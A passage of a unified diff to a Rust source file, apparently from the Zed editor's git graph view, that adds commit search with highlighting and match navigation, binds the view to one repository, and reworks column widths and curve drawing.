} fn to_row_center( @@ -900,15 +957,14 @@ fn compute_diff_stats(diff: &CommitDiff) -> (usize, usize) { pub struct GitGraph { focus_handle: FocusHandle, + search_state: SearchState, graph_data: GraphData, - project: Entity, + git_store: Entity, workspace: WeakEntity, context_menu: Option<(Entity, Point, Subscription)>, row_height: Pixels, table_interaction_state: Entity, - table_column_widths: Entity, - horizontal_scroll_offset: Pixels, - graph_viewport_width: Pixels, + column_widths: Entity, selected_entry_idx: Option, hovered_entry_idx: Option, graph_canvas_bounds: Rc>>>, @@ -918,24 +974,77 @@ pub struct GitGraph { selected_commit_diff_stats: Option<(usize, usize)>, _commit_diff_task: Option>, commit_details_split_state: Entity, - selected_repo_id: Option, + repo_id: RepositoryId, changed_files_scroll_handle: UniformListScrollHandle, pending_select_sha: Option, } impl GitGraph { + fn invalidate_state(&mut self, cx: &mut Context) { + self.graph_data.clear(); + self.search_state.matches.clear(); + self.search_state.selected_index = None; + self.search_state.state.next_state(); + cx.notify(); + } + fn row_height(cx: &App) -> Pixels { let settings = ThemeSettings::get_global(cx); let font_size = settings.buffer_font_size(cx); font_size + px(12.0) } - fn graph_content_width(&self) -> Pixels { - (LANE_WIDTH * self.graph_data.max_lanes.min(8) as f32) + LEFT_PADDING * 2.0 + fn graph_canvas_content_width(&self) -> Pixels { + (LANE_WIDTH * self.graph_data.max_lanes.max(6) as f32) + LEFT_PADDING * 2.0 + } + + fn preview_column_fractions(&self, window: &Window, cx: &App) -> [f32; 5] { + let fractions = self + .column_widths + .read(cx) + .preview_fractions(window.rem_size()); + [ + fractions[0], + fractions[1], + fractions[2], + fractions[3], + fractions[4], + ] + } + + fn table_column_width_config(&self, window: &Window, cx: &App) -> ColumnWidthConfig { + let [_, description, date, author, commit] = self.preview_column_fractions(window, cx); + let table_total = description + date + author + commit; + + let widths = if table_total > 0.0 { + vec![ + DefiniteLength::Fraction(description / table_total), + DefiniteLength::Fraction(date / table_total), + DefiniteLength::Fraction(author / table_total), + DefiniteLength::Fraction(commit / table_total), + ] + } else { + vec![ + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.25), + ] + }; + + ColumnWidthConfig::explicit(widths) + } + + fn graph_viewport_width(&self, window: &Window, cx: &App) -> Pixels { + self.column_widths + .read(cx) + .preview_column_width(0, window) + .unwrap_or_else(|| self.graph_canvas_content_width()) } pub fn new( - project: Entity, + repo_id: RepositoryId, + git_store: Entity, workspace: WeakEntity, log_source: Option, window: &mut Window, @@ -945,7 +1054,6 @@ impl GitGraph { cx.on_focus(&focus_handle, window, |_, _, cx| cx.notify()) .detach(); - let git_store = project.read(cx).git_store().clone(); let accent_colors = cx.theme().accents(); let graph = GraphData::new(accent_colors_count(accent_colors)); let log_source = log_source.unwrap_or_default(); @@ -953,35 +1061,42 @@ impl GitGraph { cx.subscribe(&git_store, |this, _, event, cx| match event { GitStoreEvent::RepositoryUpdated(updated_repo_id, repo_event, _) => { - if this - .selected_repo_id - .as_ref() - .is_some_and(|repo_id| repo_id == updated_repo_id) - { - if let Some(repository) = this.get_selected_repository(cx) { + if this.repo_id == *updated_repo_id { + if let Some(repository) = this.get_repository(cx) { this.on_repository_event(repository, repo_event, cx); } } } - GitStoreEvent::ActiveRepositoryChanged(changed_repo_id) => { - // todo(git_graph): Make this selectable from UI so we don't have to always use active repository - if this.selected_repo_id != *changed_repo_id { - this.selected_repo_id = *changed_repo_id; - this.graph_data.clear(); - cx.notify(); - } - } _ => {} }) .detach(); - let active_repository = project - .read(cx) - .active_repository(cx) - .map(|repo| repo.read(cx).id); + let search_editor = cx.new(|cx| { + let mut editor = Editor::single_line(window, cx); + editor.set_placeholder_text("Search commits…", window, cx); + editor + }); let table_interaction_state = cx.new(|cx| TableInteractionState::new(cx)); - let table_column_widths = cx.new(|cx| TableColumnWidths::new(4, cx)); + let column_widths = cx.new(|_cx| { + RedistributableColumnsState::new( + 5, + vec![ + DefiniteLength::Fraction(0.14), + DefiniteLength::Fraction(0.6192), + DefiniteLength::Fraction(0.1032), + DefiniteLength::Fraction(0.086), + DefiniteLength::Fraction(0.0516), + ], + vec![ + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + ], + ) + }); let mut row_height = Self::row_height(cx); cx.observe_global_in::(window, move |this, _window, cx| { @@ -999,16 +1114,21 @@ impl GitGraph { let mut this = GitGraph { focus_handle, - project, + git_store, + search_state: SearchState { + case_sensitive: false, + editor: search_editor, + matches: IndexSet::default(), + selected_index: None, + state: QueryState::Empty, + }, workspace, graph_data: graph, _commit_diff_task: None, context_menu: None, row_height, table_interaction_state, - table_column_widths, - horizontal_scroll_offset: px(0.), - graph_viewport_width: px(88.), + column_widths, selected_entry_idx: None, hovered_entry_idx: None, graph_canvas_bounds: Rc::new(Cell::new(None)), @@ -1017,7 +1137,7 @@ impl GitGraph { log_source, log_order, commit_details_split_state: cx.new(|_cx| SplitState::new()), - selected_repo_id: active_repository, + repo_id, changed_files_scroll_handle: UniformListScrollHandle::new(), pending_select_sha: None, }; @@ -1046,7 +1166,7 @@ impl GitGraph { .and_then(|data| data.commit_oid_to_index.get(&oid).copied()) }) { - self.select_entry(pending_sha_index, cx); + self.select_entry(pending_sha_index, ScrollStrategy::Nearest, cx); } } GitGraphEvent::LoadingError => { @@ -1082,7 +1202,7 @@ impl GitGraph { pending_sha_index }) { - self.select_entry(pending_selection_index, cx); + self.select_entry(pending_selection_index, ScrollStrategy::Nearest, cx); self.pending_select_sha.take(); } @@ -1090,14 +1210,19 @@ impl GitGraph { } } } - RepositoryEvent::BranchChanged | RepositoryEvent::MergeHeadsChanged => { + RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { self.pending_select_sha = None; // Only invalidate if we scanned atleast once, // meaning we are not inside the initial repo loading state // NOTE: this fixes an loading performance regression if repository.read(cx).scan_id > 1 { - self.graph_data.clear(); - cx.notify(); + self.invalidate_state(cx); + } + } + RepositoryEvent::StashEntriesChanged if self.log_source == LogSource::All => { + self.pending_select_sha = None; + if repository.read(cx).scan_id > 1 { + self.invalidate_state(cx); } } RepositoryEvent::GraphEvent(_, _) => {} @@ -1106,7 +1231,7 @@ impl GitGraph { } fn fetch_initial_graph_data(&mut self, cx: &mut App) { - if let Some(repository) = self.get_selected_repository(cx) { + if let Some(repository) = self.get_repository(cx) { repository.update(cx, |repository, cx| { let commits = repository .graph_data(self.log_source.clone(), self.log_order, 0..usize::MAX, cx) @@ -1116,11 +1241,9 @@ impl GitGraph { } } - fn get_selected_repository(&self, cx: &App) -> Option> { - let project = self.project.read(cx); - self.selected_repo_id - .as_ref() - .and_then(|repo_id| project.repositories(cx).get(&repo_id).cloned()) + fn get_repository(&self, cx: &App) -> Option> { + let git_store = self.git_store.read(cx); + git_store.repositories().get(&self.repo_id).cloned() } fn render_chip(&self, name: &SharedString, accent_color: gpui::Hsla) -> impl IntoElement { @@ -1136,7 +1259,7 @@ impl GitGraph { _window: &mut Window, cx: &mut Context, ) -> Vec> { - let repository = self.get_selected_repository(cx); + let repository = self.get_repository(cx); let row_height = self.row_height; @@ -1194,6 +1317,7 @@ impl GitGraph { .unwrap_or_else(|| accent_colors.0.first().copied().unwrap_or_default()); let is_selected = self.selected_entry_idx == Some(idx); + let is_matched = self.search_state.matches.contains(&commit.data.sha); let column_label = |label: SharedString| { Label::new(label) .when(!is_selected, |c| c.color(Color::Muted)) @@ -1201,11 +1325,49 @@ impl GitGraph { .into_any_element() }; + let subject_label = if is_matched { + let query = match &self.search_state.state { + QueryState::Confirmed((query, _)) => Some(query.clone()), + _ => None, + }; + let highlight_ranges = query + .and_then(|q| { + let ranges = if self.search_state.case_sensitive { + subject + .match_indices(q.as_str()) + .map(|(start, matched)| start..start + matched.len()) + .collect::>() + } else { + let q = q.to_lowercase(); + let subject_lower = subject.to_lowercase(); + + subject_lower + .match_indices(&q) + .filter_map(|(start, matched)| { + let end = start + matched.len(); + subject.is_char_boundary(start).then_some(()).and_then( + |_| subject.is_char_boundary(end).then_some(start..end), + ) + }) + .collect::>() + }; + + (!ranges.is_empty()).then_some(ranges) + }) + .unwrap_or_default(); + HighlightedLabel::from_ranges(subject.clone(), highlight_ranges) + .when(!is_selected, |c| c.color(Color::Muted)) + .truncate() + .into_any_element() + } else { + column_label(subject.clone()) + }; + vec![ div() .id(ElementId::NamedInteger("commit-subject".into(), idx as u64)) .overflow_hidden() - .tooltip(Tooltip::text(subject.clone())) + .tooltip(Tooltip::text(subject)) .child( h_flex() .gap_2() @@ -1219,7 +1381,7 @@ impl GitGraph { .map(|name| self.render_chip(name, accent_color)), ) })) - .child(column_label(subject)), + .child(subject_label), ) .into_any_element(), column_label(formatted_time.into()), @@ -1237,27 +1399,125 @@ impl GitGraph { cx.notify(); } - fn select_prev(&mut self, _: &SelectPrevious, _window: &mut Window, cx: &mut Context) { + fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context) { + self.select_entry(0, ScrollStrategy::Nearest, cx); + } + + fn select_prev(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context) { if let Some(selected_entry_idx) = &self.selected_entry_idx { - self.select_entry(selected_entry_idx.saturating_sub(1), cx); + self.select_entry( + selected_entry_idx.saturating_sub(1), + ScrollStrategy::Nearest, + cx, + ); } else { - self.select_entry(0, cx); + self.select_first(&SelectFirst, window, cx); } } fn select_next(&mut self, _: &SelectNext, window: &mut Window, cx: &mut Context) { if let Some(selected_entry_idx) = &self.selected_entry_idx { - self.select_entry(selected_entry_idx.saturating_add(1), cx); + self.select_entry( + selected_entry_idx + .saturating_add(1) + .min(self.graph_data.commits.len().saturating_sub(1)), + ScrollStrategy::Nearest, + cx, + ); } else { self.select_prev(&SelectPrevious, window, cx); } } + fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context) { + self.select_entry( + self.graph_data.commits.len().saturating_sub(1), + ScrollStrategy::Nearest, + cx, + ); + } + fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { self.open_selected_commit_view(window, cx); } - fn select_entry(&mut self, idx: usize, cx: &mut Context) { + fn search(&mut self, query: SharedString, cx: &mut Context) { + let Some(repo) = self.get_repository(cx) else { + return; + }; + + self.search_state.matches.clear(); + self.search_state.selected_index = None; + self.search_state.editor.update(cx, |editor, _cx| { + editor.set_text_style_refinement(Default::default()); + }); + + if query.as_str().is_empty() { + self.search_state.state = QueryState::Empty; + cx.notify(); + return; + } + + let (request_tx, request_rx) = smol::channel::unbounded::(); + + repo.update(cx, |repo, cx| { + repo.search_commits( + self.log_source.clone(), + SearchCommitArgs { + query: query.clone(), + case_sensitive: self.search_state.case_sensitive, + }, + request_tx, + cx, + ); + }); + + let search_task = cx.spawn(async move |this, cx| { + while let Ok(first_oid) = request_rx.recv().await { + let mut pending_oids = vec![first_oid]; + while let Ok(oid) = request_rx.try_recv() { + pending_oids.push(oid); + } + + this.update(cx, |this, cx| { + if this.search_state.selected_index.is_none() { + this.search_state.selected_index = Some(0); + this.select_commit_by_sha(first_oid, cx); + } + + this.search_state.matches.extend(pending_oids); + cx.notify(); + }) + .ok(); + } + + this.update(cx, |this, cx| { + if this.search_state.matches.is_empty() { + this.search_state.editor.update(cx, |editor, cx| { + editor.set_text_style_refinement(TextStyleRefinement { + color: Some(Color::Error.color(cx)), + ..Default::default() + }); + }); + } + }) + .ok(); + }); + + self.search_state.state = QueryState::Confirmed((query, search_task)); + } + + fn confirm_search(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context) { + let query = self.search_state.editor.read(cx).text(cx).into(); + self.search(query, cx); + } + + fn select_entry( + &mut self, + idx: usize, + scroll_strategy: ScrollStrategy, + cx: &mut Context, + ) { if self.selected_entry_idx == Some(idx) { return; } @@ -1268,9 +1528,7 @@ impl GitGraph { self.changed_files_scroll_handle .scroll_to_item(0, ScrollStrategy::Top); self.table_interaction_state.update(cx, |state, cx| { - state - .scroll_handle - .scroll_to_item(idx, ScrollStrategy::Nearest); + state.scroll_handle.scroll_to_item(idx, scroll_strategy); cx.notify(); }); @@ -1280,7 +1538,7 @@ impl GitGraph { let sha = commit.data.sha.to_string(); - let Some(repository) = self.get_selected_repository(cx) else { + let Some(repository) = self.get_repository(cx) else { return; }; @@ -1301,25 +1559,84 @@ impl GitGraph { cx.notify(); } - pub fn select_commit_by_sha(&mut self, sha: &str, cx: &mut Context) { - let Ok(oid) = sha.parse::() else { + fn select_previous_match(&mut self, cx: &mut Context) { + if self.search_state.matches.is_empty() { return; - }; + } - let Some(selected_repository) = self.get_selected_repository(cx) else { + let mut prev_selection = self.search_state.selected_index.unwrap_or_default(); + + if prev_selection == 0 { + prev_selection = self.search_state.matches.len() - 1; + } else { + prev_selection -= 1; + } + + let Some(&oid) = self.search_state.matches.get_index(prev_selection) else { return; }; - let Some(index) = selected_repository - .read(cx) - .get_graph_data(self.log_source.clone(), self.log_order) - .and_then(|data| data.commit_oid_to_index.get(&oid)) - .copied() - else { + self.search_state.selected_index = Some(prev_selection); + self.select_commit_by_sha(oid, cx); + } + + fn select_next_match(&mut self, cx: &mut Context) { + if self.search_state.matches.is_empty() { + return; + } + + let mut next_selection = self + .search_state + .selected_index + .map(|index| index + 1) + .unwrap_or_default(); + + if next_selection >= self.search_state.matches.len() { + next_selection = 0; + } + + let Some(&oid) = self.search_state.matches.get_index(next_selection) else { return; }; - self.select_entry(index, cx); + self.search_state.selected_index = Some(next_selection); + self.select_commit_by_sha(oid, cx); + } + + pub fn set_repo_id(&mut self, repo_id: RepositoryId, cx: &mut Context) { + if repo_id != self.repo_id + && self + .git_store + .read(cx) + .repositories() + .contains_key(&repo_id) + { + self.repo_id = repo_id; + self.invalidate_state(cx); + } + } + + pub fn select_commit_by_sha(&mut self, sha: impl TryInto, cx: &mut Context) { + fn inner(this: &mut GitGraph, oid: Oid, cx: &mut Context) { + let Some(selected_repository) = this.get_repository(cx) else { + return; + }; + + let Some(index) = selected_repository + .read(cx) + .get_graph_data(this.log_source.clone(), this.log_order) + .and_then(|data| data.commit_oid_to_index.get(&oid)) + .copied() + else { + return; + }; + + this.select_entry(index, ScrollStrategy::Center, cx); + } + + if let Ok(oid) = sha.try_into() { + inner(self, oid, cx); + } } fn open_selected_commit_view(&mut self, window: &mut Window, cx: &mut Context) { @@ -1340,7 +1657,7 @@ impl GitGraph { return; }; - let Some(repository) = self.get_selected_repository(cx) else { + let Some(repository) = self.get_repository(cx) else { return; }; @@ -1371,6 +1688,129 @@ impl GitGraph { }) } + fn render_search_bar(&self, cx: &mut Context) -> impl IntoElement { + let color = cx.theme().colors(); + let query_focus_handle = self.search_state.editor.focus_handle(cx); + let search_options = { + let mut options = SearchOptions::NONE; + options.set( + SearchOptions::CASE_SENSITIVE, + self.search_state.case_sensitive, + ); + options + }; + + h_flex() + .w_full() + .p_1p5() + .gap_1p5() + .border_b_1() + .border_color(color.border_variant) + .child( + h_flex() + .h_8() + .flex_1() + .min_w_0() + .px_1p5() + .gap_1() + .border_1() + .border_color(color.border) + .rounded_md() + .bg(color.toolbar_background) + .on_action(cx.listener(Self::confirm_search)) + .child(self.search_state.editor.clone()) + .child(SearchOption::CaseSensitive.as_button( + search_options, + SearchSource::Buffer, + query_focus_handle, + )), + ) + .child( + h_flex() + .min_w_64() + .gap_1() + .child({ + let focus_handle = self.focus_handle.clone(); + IconButton::new("git-graph-search-prev", IconName::ChevronLeft) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in( + "Select Previous Match", + &SelectPreviousMatch, + &focus_handle, + cx, + ) + }) + .map(|this| { + if self.search_state.matches.is_empty() { + this.disabled(true) + } else { + this.disabled(false).on_click(cx.listener(|this, _, _, cx| { + this.select_previous_match(cx); + })) + } + }) + }) + .child({ + let focus_handle = self.focus_handle.clone(); + IconButton::new("git-graph-search-next", IconName::ChevronRight) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in( + "Select Next Match", + &SelectNextMatch, + &focus_handle, + cx, + ) + }) + .map(|this| { + if self.search_state.matches.is_empty() { + this.disabled(true) + } else { + this.disabled(false).on_click(cx.listener(|this, _, _, cx| { + this.select_next_match(cx); + })) + } + }) + }) + .child( + h_flex() + .gap_1p5() + .child( + Label::new(format!( + "{}/{}", + self.search_state + .selected_index + .map(|index| index + 1) + .unwrap_or(0), + self.search_state.matches.len() + )) + .size(LabelSize::Small) + .when(self.search_state.matches.is_empty(), |this| { + this.color(Color::Disabled) + }), + ) + .when( + matches!( + &self.search_state.state, + QueryState::Confirmed((_, task)) if !task.is_ready() + ), + |this| { + this.child( + Icon::new(IconName::ArrowCircle) + .color(Color::Accent) + .size(IconSize::Small) + .with_rotate_animation(2) + .into_any_element(), + ) + }, + ), + ), + ) + } + fn render_loading_spinner(&self, cx: &App) -> AnyElement { let rems = TextSize::Large.rems(cx); Icon::new(IconName::LoadCircle) @@ -1393,7 +1833,7 @@ impl GitGraph { return Empty.into_any_element(); }; - let Some(repository) = self.get_selected_repository(cx) else { + let Some(repository) = self.get_repository(cx) else { return Empty.into_any_element(); }; @@ -1413,7 +1853,8 @@ impl GitGraph { .copied() .unwrap_or_else(|| accent_colors.0.first().copied().unwrap_or_default()); - let (author_name, author_email, commit_timestamp, subject) = match &data { + // todo(git graph): We should use the full commit message here + let (author_name, author_email, commit_timestamp, commit_message) = match &data { CommitDataState::Loaded(data) => ( data.author_name.clone(), data.author_email.clone(), @@ -1547,10 +1988,9 @@ impl GitGraph { this.child( Button::new("author-email-copy", author_email.clone()) - .icon(icon) - .icon_size(IconSize::Small) - .icon_color(icon_color) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(icon).size(IconSize::Small).color(icon_color), + ) .label_size(LabelSize::Small) .truncate(true) .color(Color::Muted) @@ -1595,10 +2035,9 @@ impl GitGraph { }; Button::new("sha-button", &full_sha) - .icon(icon) - .icon_size(IconSize::Small) - .icon_color(icon_color) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(icon).size(IconSize::Small).color(icon_color), + ) .label_size(LabelSize::Small) .truncate(true) .color(Color::Muted) @@ -1655,10 +2094,9 @@ impl GitGraph { "view-on-provider", format!("View on {}", provider_name), ) - .icon(icon) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(icon).size(IconSize::Small).color(Color::Muted), + ) .label_size(LabelSize::Small) .truncate(true) .color(Color::Muted) @@ -1672,7 +2110,7 @@ impl GitGraph { ), ) .child(Divider::horizontal()) - .child(div().min_w_0().p_2().child(Label::new(subject))) + .child(div().p_2().child(Label::new(commit_message))) .child(Divider::horizontal()) .child( v_flex() @@ -1761,10 +2199,13 @@ impl GitGraph { let first_visible_row = (scroll_offset_y / row_height).floor() as usize; let vertical_scroll_offset = scroll_offset_y - (first_visible_row as f32 * row_height); - let horizontal_scroll_offset = self.horizontal_scroll_offset; - let max_lanes = self.graph_data.max_lanes.max(6); - let graph_width = LANE_WIDTH * max_lanes as f32 + LEFT_PADDING * 2.0; + let graph_viewport_width = self.graph_viewport_width(window, cx); + let graph_width = if self.graph_canvas_content_width() > graph_viewport_width { + self.graph_canvas_content_width() + } else { + graph_viewport_width + }; let last_visible_row = first_visible_row + (viewport_height / row_height).ceil() as usize + 1; @@ -1832,8 +2273,7 @@ impl GitGraph { bounds.origin.y + row_idx as f32 * row_height + row_height / 2.0 - vertical_scroll_offset; - let commit_x = - lane_center_x(bounds, row.lane as f32, horizontal_scroll_offset); + let commit_x = lane_center_x(bounds, row.lane as f32); draw_commit_circle(commit_x, row_y_center, row_color, window); } @@ -1845,8 +2285,7 @@ impl GitGraph { continue; }; - let line_x = - lane_center_x(bounds, start_column as f32, horizontal_scroll_offset); + let line_x = lane_center_x(bounds, start_column as f32); let start_row = line.full_interval.start as i32 - first_visible_row as i32; @@ -1862,6 +2301,8 @@ impl GitGraph { builder.move_to(point(line_x, from_y)); let segments = &line.segments[start_segment_idx..]; + let desired_curve_height = row_height / 3.0; + let desired_curve_width = LANE_WIDTH / 3.0; for (segment_idx, segment) in segments.iter().enumerate() { let is_last = segment_idx + 1 == segments.len(); @@ -1889,11 +2330,7 @@ impl GitGraph { on_row, curve_kind, } => { - let mut to_column = lane_center_x( - bounds, - *to_column as f32, - horizontal_scroll_offset, - ); + let mut to_column = lane_center_x(bounds, *to_column as f32); let mut to_row = to_row_center( *on_row - first_visible_row, @@ -1910,53 +2347,76 @@ impl GitGraph { -COMMIT_CIRCLE_RADIUS - COMMIT_CIRCLE_STROKE_WIDTH }; - let control = match curve_kind { + match curve_kind { CurveKind::Checkout => { if is_last { to_column -= column_shift; } + + let available_curve_width = + (to_column - current_column).abs(); + let available_curve_height = + (to_row - current_row).abs(); + let curve_width = + desired_curve_width.min(available_curve_width); + let curve_height = + desired_curve_height.min(available_curve_height); + let signed_curve_width = if going_right { + curve_width + } else { + -curve_width + }; + let curve_start = + point(current_column, to_row - curve_height); + let curve_end = + point(current_column + signed_curve_width, to_row); + let curve_control = point(current_column, to_row); + builder.move_to(point(current_column, current_row)); - point(current_column, to_row) + builder.line_to(curve_start); + builder.move_to(curve_start); + builder.curve_to(curve_end, curve_control); + builder.move_to(curve_end); + builder.line_to(point(to_column, to_row)); } CurveKind::Merge => { if is_last { to_row -= COMMIT_CIRCLE_RADIUS; } - builder.move_to(point( - current_column + column_shift, - current_row - COMMIT_CIRCLE_RADIUS, - )); - point(to_column, current_row) - } - }; - - match curve_kind { - CurveKind::Checkout - if (to_row - current_row).abs() > row_height => - { - let start_curve = - point(current_column, current_row + row_height); - builder.line_to(start_curve); - builder.move_to(start_curve); - } - CurveKind::Merge - if (to_column - current_column).abs() > LANE_WIDTH => - { - let column_shift = - if going_right { LANE_WIDTH } else { -LANE_WIDTH }; - let start_curve = point( + let merge_start = point( current_column + column_shift, current_row - COMMIT_CIRCLE_RADIUS, ); - - builder.line_to(start_curve); - builder.move_to(start_curve); + let available_curve_width = + (to_column - merge_start.x).abs(); + let available_curve_height = + (to_row - merge_start.y).abs(); + let curve_width = + desired_curve_width.min(available_curve_width); + let curve_height = + desired_curve_height.min(available_curve_height); + let signed_curve_width = if going_right { + curve_width + } else { + -curve_width + }; + let curve_start = point( + to_column - signed_curve_width, + merge_start.y, + ); + let curve_end = + point(to_column, merge_start.y + curve_height); + let curve_control = point(to_column, merge_start.y); + + builder.move_to(merge_start); + builder.line_to(curve_start); + builder.move_to(curve_start); + builder.curve_to(curve_end, curve_control); + builder.move_to(curve_end); + builder.line_to(point(to_column, to_row)); } - _ => {} - }; - - builder.curve_to(point(to_column, to_row), control); + } current_row = to_row; current_column = to_column; builder.move_to(point(current_column, current_row)); @@ -1996,9 +2456,8 @@ impl GitGraph { let local_y = position_y - canvas_bounds.origin.y; if local_y >= px(0.) && local_y < canvas_bounds.size.height { - let row_in_viewport = (local_y / self.row_height).floor() as usize; - let scroll_rows = (scroll_offset_y / self.row_height).floor() as usize; - let absolute_row = scroll_rows + row_in_viewport; + let absolute_y = local_y + scroll_offset_y; + let absolute_row = (absolute_y / self.row_height).floor() as usize; if absolute_row < self.graph_data.commits.len() { return Some(absolute_row); @@ -2032,7 +2491,7 @@ impl GitGraph { cx: &mut Context, ) { if let Some(row) = self.row_at_position(event.position().y, cx) { - self.select_entry(row, cx); + self.select_entry(row, ScrollStrategy::Nearest, cx); if event.click_count() >= 2 { self.open_commit_view(row, window, cx); } @@ -2063,25 +2522,8 @@ impl GitGraph { let new_y = (current_offset.y + delta.y).clamp(max_vertical_scroll, px(0.)); let new_offset = Point::new(current_offset.x, new_y); - let max_lanes = self.graph_data.max_lanes.max(1); - let graph_content_width = LANE_WIDTH * max_lanes as f32 + LEFT_PADDING * 2.0; - let max_horizontal_scroll = (graph_content_width - self.graph_viewport_width).max(px(0.)); - - let new_horizontal_offset = - (self.horizontal_scroll_offset - delta.x).clamp(px(0.), max_horizontal_scroll); - - let vertical_changed = new_offset != current_offset; - let horizontal_changed = new_horizontal_offset != self.horizontal_scroll_offset; - - if vertical_changed { + if new_offset != current_offset { table_state.set_scroll_offset(new_offset); - } - - if horizontal_changed { - self.horizontal_scroll_offset = new_horizontal_offset; - } - - if vertical_changed || horizontal_changed { cx.notify(); } } @@ -2123,40 +2565,40 @@ impl GitGraph { impl Render for GitGraph { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let description_width_fraction = 0.72; - let date_width_fraction = 0.12; - let author_width_fraction = 0.10; - let commit_width_fraction = 0.06; - + // This happens when we changed branches, we should refresh our search as well + if let QueryState::Pending(query) = &mut self.search_state.state { + let query = std::mem::take(query); + self.search_state.state = QueryState::Empty; + self.search(query, cx); + } let (commit_count, is_loading) = match self.graph_data.max_commit_count { AllCommitCount::Loaded(count) => (count, true), AllCommitCount::NotLoaded => { - let (commit_count, is_loading) = - if let Some(repository) = self.get_selected_repository(cx) { - repository.update(cx, |repository, cx| { - // Start loading the graph data if we haven't started already - let GraphDataResponse { - commits, - is_loading, - error: _, - } = repository.graph_data( - self.log_source.clone(), - self.log_order, - 0..usize::MAX, - cx, - ); - self.graph_data.add_commits(&commits); - (commits.len(), is_loading) - }) - } else { - (0, false) - }; + let (commit_count, is_loading) = if let Some(repository) = self.get_repository(cx) { + repository.update(cx, |repository, cx| { + // Start loading the graph data if we haven't started already + let GraphDataResponse { + commits, + is_loading, + error: _, + } = repository.graph_data( + self.log_source.clone(), + self.log_order, + 0..usize::MAX, + cx, + ); + self.graph_data.add_commits(&commits); + (commits.len(), is_loading) + }) + } else { + (0, false) + }; (commit_count, is_loading) } }; - let error = self.get_selected_repository(cx).and_then(|repo| { + let error = self.get_repository(cx).and_then(|repo| { repo.read(cx) .get_graph_data(self.log_source.clone(), self.log_order) .and_then(|data| data.error.clone()) @@ -2184,131 +2626,200 @@ impl Render for GitGraph { this.child(self.render_loading_spinner(cx)) }) } else { - div() + let header_resize_info = HeaderResizeInfo::from_state(&self.column_widths, cx); + let header_context = TableRenderContext::for_column_widths( + Some(self.column_widths.read(cx).widths_to_render()), + true, + ); + let [ + graph_fraction, + description_fraction, + date_fraction, + author_fraction, + commit_fraction, + ] = self.preview_column_fractions(window, cx); + let table_fraction = + description_fraction + date_fraction + author_fraction + commit_fraction; + let table_width_config = self.table_column_width_config(window, cx); + + h_flex() .size_full() - .flex() - .flex_row() .child( div() - .w(self.graph_content_width()) - .h_full() + .flex_1() + .min_w_0() + .size_full() .flex() .flex_col() - .child( - div() - .p_2() - .border_b_1() - .whitespace_nowrap() - .border_color(cx.theme().colors().border) - .child(Label::new("Graph").color(Color::Muted)), - ) - .child( - div() - .id("graph-canvas") - .flex_1() - .overflow_hidden() - .child(self.render_graph(window, cx)) - .on_scroll_wheel(cx.listener(Self::handle_graph_scroll)) - .on_mouse_move(cx.listener(Self::handle_graph_mouse_move)) - .on_click(cx.listener(Self::handle_graph_click)) - .on_hover(cx.listener(|this, &is_hovered: &bool, _, cx| { - if !is_hovered && this.hovered_entry_idx.is_some() { - this.hovered_entry_idx = None; - cx.notify(); - } - })), - ), - ) - .child({ - let row_height = self.row_height; - let selected_entry_idx = self.selected_entry_idx; - let hovered_entry_idx = self.hovered_entry_idx; - let weak_self = cx.weak_entity(); - let focus_handle = self.focus_handle.clone(); - div().flex_1().size_full().child( - Table::new(4) - .interactable(&self.table_interaction_state) - .hide_row_borders() - .hide_row_hover() - .header(vec![ - Label::new("Description") - .color(Color::Muted) - .into_any_element(), - Label::new("Date").color(Color::Muted).into_any_element(), - Label::new("Author").color(Color::Muted).into_any_element(), - Label::new("Commit").color(Color::Muted).into_any_element(), - ]) - .column_widths( - [ - DefiniteLength::Fraction(description_width_fraction), - DefiniteLength::Fraction(date_width_fraction), - DefiniteLength::Fraction(author_width_fraction), - DefiniteLength::Fraction(commit_width_fraction), - ] - .to_vec(), - ) - .resizable_columns( + .child(render_table_header( + TableRow::from_vec( vec![ - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, + Label::new("Graph") + .color(Color::Muted) + .truncate() + .into_any_element(), + Label::new("Description") + .color(Color::Muted) + .into_any_element(), + Label::new("Date").color(Color::Muted).into_any_element(), + Label::new("Author").color(Color::Muted).into_any_element(), + Label::new("Commit").color(Color::Muted).into_any_element(), ], - &self.table_column_widths, - cx, - ) - .map_row(move |(index, row), window, cx| { - let is_selected = selected_entry_idx == Some(index); - let is_hovered = hovered_entry_idx == Some(index); - let is_focused = focus_handle.is_focused(window); - let weak = weak_self.clone(); - let weak_for_hover = weak.clone(); - - let hover_bg = cx.theme().colors().element_hover.opacity(0.6); - let selected_bg = if is_focused { - cx.theme().colors().element_selected - } else { - cx.theme().colors().element_hover - }; - - row.h(row_height) - .when(is_selected, |row| row.bg(selected_bg)) - .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) - .on_hover(move |&is_hovered, _, cx| { - weak_for_hover - .update(cx, |this, cx| { - if is_hovered { - if this.hovered_entry_idx != Some(index) { - this.hovered_entry_idx = Some(index); - cx.notify(); - } - } else if this.hovered_entry_idx == Some(index) { - // Only clear if this row was the hovered one - this.hovered_entry_idx = None; - cx.notify(); - } - }) - .ok(); - }) - .on_click(move |event, window, cx| { - let click_count = event.click_count(); - weak.update(cx, |this, cx| { - this.select_entry(index, cx); - if click_count >= 2 { - this.open_commit_view(index, window, cx); - } - }) - .ok(); - }) - .into_any_element() - }) - .uniform_list( - "git-graph-commits", - commit_count, - cx.processor(Self::render_table_rows), + 5, ), - ) - 